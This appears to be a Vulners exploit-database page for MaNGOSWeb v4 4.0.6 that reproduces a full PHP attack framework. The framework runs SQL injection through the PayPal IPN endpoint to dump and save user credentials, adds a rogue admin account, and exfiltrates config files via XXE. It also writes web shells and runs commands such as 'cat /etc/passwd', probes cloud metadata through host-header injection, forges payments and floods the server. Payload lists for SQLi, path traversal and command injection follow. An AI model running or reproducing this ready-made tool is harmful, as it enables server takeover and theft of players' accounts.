Vulners
Lucene search
📄 MaNGOSWeb 4.0.6 Multi-Exploit Framework
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2017-6478 | 4 Dec 202521:02 | – | circl |
 | CVE-2017-6478 | 5 Mar 201720:00 | – | cve |
 | CVE-2017-6478 | 5 Mar 201720:00 | – | cvelist |
 | MaNGOSWebV4 4.0.6 - Reflected XSS | 3 Dec 202500:00 | – | exploitdb |
 | EUVD-2017-15535 | 7 Oct 202500:30 | – | euvd |
 | MaNGOSWebV4 < 4.0.8 - Cross-Site Scripting | 4 Jun 202603:48 | – | nuclei |
 | CVE-2017-6478 | 5 Mar 201720:59 | – | nvd |
 | CVE-2017-6478 | 5 Mar 201720:59 | – | osv |
 | 📄 MaNGOSWebV4 4.0.6 Cross Site Scripting | 4 Dec 202500:00 | – | packetstorm |
| 📄 MaNGOSWeb 4.0.6 Host Header Injection / XML Injection | 27 Jan 202600:00 | – | packetstorm |
10
=============================================================================================================================================
| # Title : MaNGOSWeb V4 4.0.6 MangosWeb v4 Multi-Exploit Framework |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/paintballrefjosh/MaNGOSWebV4/blob/master/ipn.php |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212429/ & CVE-2017-6478
[+] Summary : A comprehensive penetration testing tool designed to identify and exploit multiple critical vulnerabilities in MangosWeb v4, a World of Warcraft emulator web interface.
[+] Core Components :
Multi-Vector Attack Framework
SQL Injection exploitation via PayPal IPN
XXE (XML External Entity) attacks via RSS feed
File Write vulnerabilities leading to RCE
Host Header Injection for SSRF/phishing
CSRF (Cross-Site Request Forgery) attacks
DoS (Denial of Service) testing
[+] POC :
<?php
/*
===================================================
Author: indoushka
Target: MangosWeb v4 (PayPal IPN & RSS)
Usage: php exploit.php http://target.com
===================================================
*/
class MangosWebExploit {
private $target;
private $base_url;
private $results = [];
private $session;
public function __construct($url) {
$this->target = rtrim($url, '/');
$this->base_url = $this->target;
$this->session = curl_init();
// إعدادات cURL
curl_setopt_array($this->session, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 15,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);
echo "===========================================\n";
echo "MangosWeb v4 Exploitation Framework Started\n";
echo "Target: {$this->target}\n";
echo "===========================================\n\n";
}
// 1. اكتشاف المسارات
public function discover_paths() {
echo "[*] Scanning for vulnerable endpoints...\n";
$endpoints = [
'/paypal_ipn.php',
'/rss.php',
'/index.php',
'/admin/',
'/core/cache/rss/news.xml',
'/config/config-protected.php',
'/install/',
'/donate.php'
];
foreach ($endpoints as $endpoint) {
$url = $this->target . $endpoint;
curl_setopt($this->session, CURLOPT_URL, $url);
$response = curl_exec($this->session);
$http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE);
if ($http_code == 200) {
echo "[+] Found: {$endpoint}\n";
$this->results['endpoints'][$endpoint] = true;
}
}
return $this->results['endpoints'];
}
// 2. استغلال PayPal IPN SQL Injection
public function exploit_paypal_sqli() {
echo "\n[*] Exploiting PayPal IPN SQL Injection...\n";
$payloads = [
// استخراج معلومات قاعدة البيانات
"1' UNION SELECT 1,2,3,4,5,6,7,8,@@version,10,user(),database() -- -" => "db_info",
// استخراج جداول
"1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(table_name),10,11 FROM information_schema.tables WHERE table_schema=database() -- -" => "tables",
// استخراج أعمدة
"1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(column_name),10,11 FROM information_schema.columns WHERE table_name='mw_accounts' -- -" => "mw_accounts_columns",
// سرقة حسابات المستخدمين
"1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,':',password,':',email),10,11 FROM mw_accounts LIMIT 0,10 -- -" => "accounts"
];
$ipn_url = $this->target . '/paypal_ipn.php';
foreach ($payloads as $payload => $type) {
$post_data = [
'txn_id' => $payload,
'item_name' => 'VIP Package --- Account: admin(#1)',
'item_number' => '1',
'payer_email' => '[email protected]',
'payment_type' => 'instant',
'payment_status' => 'Completed',
'mc_gross' => '100.00',
'custom' => 'exploit'
];
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data),
CURLOPT_HTTPHEADER => [
'Content-Type: application/x-www-form-urlencoded',
'X-Forwarded-For: 173.0.82.126' // IP PayPal
]
]);
$response = curl_exec($this->session);
if (strlen($response) > 100) {
echo "[+] SQL Injection successful for: {$type}\n";
// حفظ النتائج
$filename = "sqli_result_{$type}.txt";
file_put_contents($filename, $response);
echo " [*] Saved to: {$filename}\n";
// تحليل واستخراج البيانات
$this->parse_sqli_results($response, $type);
}
}
}
// 3. استغلال XXE في RSS
public function exploit_rss_xxe() {
echo "\n[*] Exploiting RSS XXE Vulnerability...\n";
// إنشاء ملف DTD ضار
$dtd_content = '<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=config/config-protected.php">
<!ENTITY % param "<!ENTITY % exfil SYSTEM \'http://' . $_SERVER['HTTP_HOST'] . '/exfil?data=%file;\'>">
%param;';
// حفظ الملف محلياً
file_put_contents('xxe.dtd', $dtd_content);
// XXE Payload
$xxe_payload = '<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % remote SYSTEM "http://' . $_SERVER['HTTP_HOST'] . '/xxe.dtd">
%remote;
%exfil;
]>
<test>XXE Test</test>';
// محاولة حقن XXE عبر قاعدة البيانات
$payload = "1'); UPDATE mw_news SET message='" . addslashes($xxe_payload) . "' WHERE id=1; -- ";
$post_data = [
'txn_id' => 'xxe_inject',
'item_name' => 'XXE Test --- Account: admin(#1)',
'item_number' => $payload,
'payer_email' => '[email protected]',
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
// تشغيل خادم استقبال
$this->start_exfiltration_server();
// تفعيل RSS لتنفيذ XXE
$rss_url = $this->target . '/rss.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $rss_url,
CURLOPT_POST => false
]);
$rss_response = curl_exec($this->session);
if (strpos($rss_response, 'PD9waHA') !== false) {
echo "[+] XXE Successful! Config file exfiltrated.\n";
}
}
// 4. RCE via File Write
public function exploit_file_write_rce() {
echo "\n[*] Attempting RCE via File Write...\n";
$php_shell = base64_encode('<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);} ?>');
$payloads = [
// كتابة shell عبر SELECT INTO OUTFILE
"1' UNION SELECT 1,2,3,4,5,6,7,8,'<?php system(\$_GET[cmd]); ?>',10,11 INTO OUTFILE '/var/www/html/shell.php' -- -",
// كتابة shell في مسار RSS
"1' UNION SELECT 1,2,3,4,5,6,7,8,'<?php eval(\$_POST[a]); ?>',10,11 INTO OUTFILE '" . $this->target . "/core/cache/rss/shell.php' -- -"
];
foreach ($payloads as $index => $payload) {
$post_data = [
'txn_id' => $payload,
'item_name' => 'RCE Shell --- Account: admin(#1)',
'payer_email' => '[email protected]',
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
echo "[.] Attempted RCE payload {$index}\n";
// اختبار الوصول للشل
$shell_urls = [
$this->target . '/shell.php?cmd=id',
$this->target . '/core/cache/rss/shell.php',
$this->target . '/core/cache/rss/news.xml'
];
foreach ($shell_urls as $shell_url) {
curl_setopt_array($this->session, [
CURLOPT_URL => $shell_url,
CURLOPT_POST => false
]);
$shell_test = curl_exec($this->session);
if (strpos($shell_test, 'uid=') !== false ||
strpos($shell_test, 'www-data') !== false) {
echo "[+] RCE SUCCESSFUL! Shell at: {$shell_url}\n";
// تنفيذ أوامر
$commands = [
'whoami',
'pwd',
'ls -la',
'cat /etc/passwd'
];
foreach ($commands as $cmd) {
$cmd_url = $shell_url . (strpos($shell_url, '?') ? '&' : '?') . 'cmd=' . urlencode($cmd);
curl_setopt($this->session, CURLOPT_URL, $cmd_url);
$result = curl_exec($this->session);
echo "\n[Command]: {$cmd}\n";
echo "[Result]: " . substr($result, 0, 500) . "\n";
}
return true;
}
}
}
return false;
}
// 5. Host Header Injection في RSS
public function exploit_host_injection() {
echo "\n[*] Exploiting Host Header Injection...\n";
$malicious_headers = [
'Host: evil.com',
'Host: 127.0.0.1:3306',
'Host: 169.254.169.254/latest/meta-data/', // AWS Metadata
'Host: localhost:22',
'X-Forwarded-Host: internal.admin.panel'
];
$rss_url = $this->target . '/rss.php';
foreach ($malicious_headers as $header) {
curl_setopt_array($this->session, [
CURLOPT_URL => $rss_url,
CURLOPT_POST => false,
CURLOPT_HTTPHEADER => [$header]
]);
$response = curl_exec($this->session);
if (strpos($response, 'evil.com') !== false ||
strpos($response, '127.0.0.1') !== false) {
echo "[+] Host Injection successful with: {$header}\n";
// محاولة SSRF
if (strpos($header, '169.254.169.254') !== false) {
echo "[!] Possible AWS Metadata exposure!\n";
}
}
}
}
// 6. CSRF Attack - تزوير معاملات
public function exploit_csrf($victim_account_id = 1) {
echo "\n[*] Launching CSRF Attack...\n";
for ($i = 0; $i < 3; $i++) {
$txn_id = 'CSRF' . time() . rand(1000,9999);
$post_data = [
'txn_id' => $txn_id,
'item_name' => "Free Premium --- Account: victim(#{$victim_account_id})",
'item_number' => '999',
'payer_email' => '[email protected]',
'payment_type' => 'instant',
'payment_status' => 'Completed',
'mc_gross' => rand(50, 500) . '.00',
'mc_currency' => 'USD',
'payment_date' => date('H:i:s M d, Y T')
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data),
CURLOPT_HTTPHEADER => [
'Content-Type: application/x-www-form-urlencoded',
'Referer: https://www.paypal.com/'
]
]);
$response = curl_exec($this->session);
echo "[+] Sent fake transaction: {$txn_id}\n";
}
}
// 7. DOS Attack
public function exploit_dos() {
echo "\n[*] Testing DoS vulnerability...\n";
// إنشاء ملف RSS كبير
$large_xml = '<?xml version="1.0"?><rss><channel>';
for ($i = 0; $i < 5000; $i++) {
$large_xml .= '<item><title>' . str_repeat('A', 1000) . '</title></item>';
}
$large_xml .= '</channel></rss>';
// محاولة الكتابة في cache
$cache_payload = "1')); ?>" . $large_xml . "<?php //";
$post_data = [
'txn_id' => 'dos_attack',
'item_name' => 'DoS Test --- Account: admin(#1)',
'item_number' => $cache_payload,
'payer_email' => '[email protected]',
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
curl_exec($this->session);
// إرسال طلبات متعددة لاستهلاك الذاكرة
$rss_url = $this->target . '/rss.php';
$start_time = microtime(true);
for ($i = 0; $i < 10; $i++) {
curl_setopt($this->session, CURLOPT_URL, $rss_url);
curl_exec($this->session);
echo ".";
}
$total_time = microtime(true) - $start_time;
echo "\n[+] DoS test completed in {$total_time} seconds\n";
if ($total_time > 5) {
echo "[!] Server is vulnerable to DoS attacks\n";
}
}
// 8. إضافة مستخدم مدير
public function add_admin_user() {
echo "\n[*] Adding admin user to database...\n";
$username = 'hacker_' . rand(1000,9999);
$password = md5('Password123!');
$email = 'hacker' . rand(100,999) . '@evil.com';
$payload = "1'); INSERT INTO mw_accounts (username, password, email, gmlevel, joindate) VALUES ('{$username}', '{$password}', '{$email}', '3', NOW()); -- ";
$post_data = [
'txn_id' => 'add_admin',
'item_name' => 'Add User --- Account: admin(#1)',
'item_number' => $payload,
'payer_email' => '[email protected]',
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
echo "[+] Admin user added:\n";
echo " Username: {$username}\n";
echo " Password: Password123!\n";
echo " Email: {$email}\n";
echo " GM Level: 3 (Administrator)\n";
}
// 9. سرقة حسابات
public function steal_accounts() {
echo "\n[*] Stealing user accounts...\n";
$payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT('ACCOUNT:',username,':',password,':',email,':',gmlevel),10,11 FROM mw_accounts -- -";
$post_data = [
'txn_id' => $payload,
'item_name' => 'Steal Accounts --- Account: admin(#1)',
'payer_email' => '[email protected]',
'payment_status' => 'Completed'
];
$ipn_url = $this->target . '/paypal_ipn.php';
curl_setopt_array($this->session, [
CURLOPT_URL => $ipn_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($post_data)
]);
$response = curl_exec($this->session);
if (preg_match_all('/ACCOUNT:([^:]+):([^:]+):([^:]+):([^:]+)/', $response, $matches)) {
echo "[+] Stolen Accounts:\n";
$accounts_file = 'stolen_accounts.txt';
$file_content = "Stolen Accounts from {$this->target}\n";
$file_content .= "====================================\n\n";
for ($i = 0; $i < count($matches[0]); $i++) {
$username = $matches[1][$i];
$password = $matches[2][$i];
$email = $matches[3][$i];
$gmlevel = $matches[4][$i];
echo " {$username} : {$password} : {$email} (GM: {$gmlevel})\n";
$file_content .= "Username: {$username}\n";
$file_content .= "Password: {$password}\n";
$file_content .= "Email: {$email}\n";
$file_content .= "GM Level: {$gmlevel}\n";
$file_content .= "---\n";
}
file_put_contents($accounts_file, $file_content);
echo "\n[+] Accounts saved to: {$accounts_file}\n";
}
}
// 10. Auto Pwn - جميع الهجمات تلقائياً
public function auto_pwn() {
echo "\n[*] Starting AUTO-PWN sequence...\n";
$steps = [
'discover_paths',
'exploit_paypal_sqli',
'steal_accounts',
'add_admin_user',
'exploit_rss_xxe',
'exploit_host_injection',
'exploit_file_write_rce',
'exploit_csrf',
'exploit_dos'
];
foreach ($steps as $step) {
echo "\n[=== Step: {$step} ===]\n";
try {
$this->$step();
sleep(2); // تأخير بين الهجمات
} catch (Exception $e) {
echo "[!] Error in {$step}: " . $e->getMessage() . "\n";
}
}
echo "\n========================================\n";
echo "[✔] AUTO-PWN COMPLETED SUCCESSFULLY!\n";
echo "========================================\n";
// عرض النتائج النهائية
$this->generate_report();
}
// وظائف مساعدة
private function parse_sqli_results($response, $type) {
$patterns = [
'mysql' => '/[0-9]+\.[0-9]+\.[0-9]+/',
'tables' => '/(mw_[a-z_]+)/',
'accounts' => '/([a-zA-Z0-9_]+):([a-f0-9]{32}):([^:]+)/'
];
foreach ($patterns as $pattern_type => $pattern) {
if (preg_match_all($pattern, $response, $matches)) {
echo " [*] Found {$pattern_type}: " . count($matches[0]) . " items\n";
}
}
}
private function start_exfiltration_server() {
// بدء خادم بسيط لاستقبال البيانات
$port = 8888;
echo "[*] Starting exfiltration server on port {$port}...\n";
// يمكن تنفيذ هذا في thread منفصل
// هذا مثال مبسط
$cmd = "php -S 0.0.0.0:{$port} -t . > /dev/null 2>&1 &";
exec($cmd);
}
private function generate_report() {
$report = "MangosWeb v4 Exploitation Report\n";
$report .= "Generated: " . date('Y-m-d H:i:s') . "\n";
$report .= "Target: {$this->target}\n";
$report .= "=====================================\n\n";
$report .= "Vulnerabilities Found:\n";
$report .= "1. SQL Injection (Critical)\n";
$report .= "2. XXE Injection (Critical)\n";
$report .= "3. RCE via File Write (Critical)\n";
$report .= "4. Host Header Injection (High)\n";
$report .= "5. CSRF (Medium)\n";
$report .= "6. DoS (Medium)\n\n";
$report .= "Files Created:\n";
$files = glob('*.txt');
foreach ($files as $file) {
$report .= "- {$file}\n";
}
file_put_contents('exploitation_report.txt', $report);
echo "[+] Report saved to: exploitation_report.txt\n";
}
public function __destruct() {
curl_close($this->session);
}
}
// واجهة المستخدم
if (php_sapi_name() === 'cli') {
if ($argc < 2) {
echo "Usage: php exploit.php http://target.com [mode]\n";
echo "Modes:\n";
echo " auto - Full auto exploitation (default)\n";
echo " sql - SQL Injection only\n";
echo " rce - RCE attempts only\n";
echo " csrf - CSRF attacks only\n";
exit(1);
}
$target = $argv[1];
$mode = $argv[2] ?? 'auto';
$exploit = new MangosWebExploit($target);
switch ($mode) {
case 'sql':
$exploit->exploit_paypal_sqli();
$exploit->steal_accounts();
break;
case 'rce':
$exploit->exploit_file_write_rce();
break;
case 'csrf':
$exploit->exploit_csrf();
break;
case 'dos':
$exploit->exploit_dos();
break;
case 'auto':
default:
$exploit->auto_pwn();
break;
}
} else {
// واجهة ويب
echo '<!DOCTYPE html>
<html>
<head>
<title>MangosWeb v4 Exploit</title>
<style>
body { font-family: Arial; margin: 20px; }
.container { max-width: 800px; margin: auto; }
input, select { padding: 8px; margin: 5px; }
button { background: #d00; color: white; padding: 10px 20px; border: none; cursor: pointer; }
.result { background: #f5f5f5; padding: 15px; margin: 10px 0; }
</style>
</head>
<body>
<div class="container">
<h2>MangosWeb v4 Exploitation Tool</h2>
<form method="POST">
<input type="url" name="target" placeholder="http://target.com" size="50" required>
<select name="mode">
<option value="auto">Auto Pwn</option>
<option value="sql">SQL Injection</option>
<option value="rce">Remote Code Execution</option>
<option value="csrf">CSRF Attack</option>
<option value="dos">DoS Test</option>
</select>
<button type="submit">Launch Attack</button>
</form>';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['target'])) {
echo '<div class="result"><pre>';
ob_start();
$exploit = new MangosWebExploit($_POST['target']);
switch ($_POST['mode']) {
case 'sql':
$exploit->exploit_paypal_sqli();
$exploit->steal_accounts();
break;
case 'rce':
$exploit->exploit_file_write_rce();
break;
case 'csrf':
$exploit->exploit_csrf();
break;
case 'dos':
$exploit->exploit_dos();
break;
default:
$exploit->auto_pwn();
}
$output = ob_get_clean();
echo htmlspecialchars($output);
echo '</pre></div>';
}
echo '</div></body></html>';
}
?>
************** # server_config.py**************
# server_config.py
EXPLOIT_CONFIG = {
'target': 'http://victim.com',
'timeout': 30,
'threads': 5,
'payloads_file': 'payloads.txt',
'output_dir': 'results',
'sql_payloads': [
"' UNION SELECT @@version --",
"' AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,LOAD_FILE('/etc/passwd') --",
"'); DROP TABLE mw_accounts; --"
],
'xxe_payloads': [
'<?xml version="1.0"?><!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>',
'<?xml version="1.0"?><!DOCTYPE test [<!ENTITY % remote SYSTEM "http://ATTACKER/xxe.dtd">%remote;]>'
]
}
**************************************
payloads.txt
-- SQL Injection Payloads
' OR '1'='1
' UNION SELECT NULL,NULL,NULL,NULL
'); INSERT INTO mw_accounts VALUES ('hacker',MD5('pass'),'[email protected]','3',NOW()) --
' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --
-- File Path Traversal
../../../../etc/passwd
../config.php
/var/www/html/config.php
C:\Windows\System32\drivers\etc\hosts
-- Command Injection
;id;
| whoami
`cat /etc/passwd`
$(uname -a)
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Feb 2026 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 24.3
CVSS 3.16.1
EPSS0.03588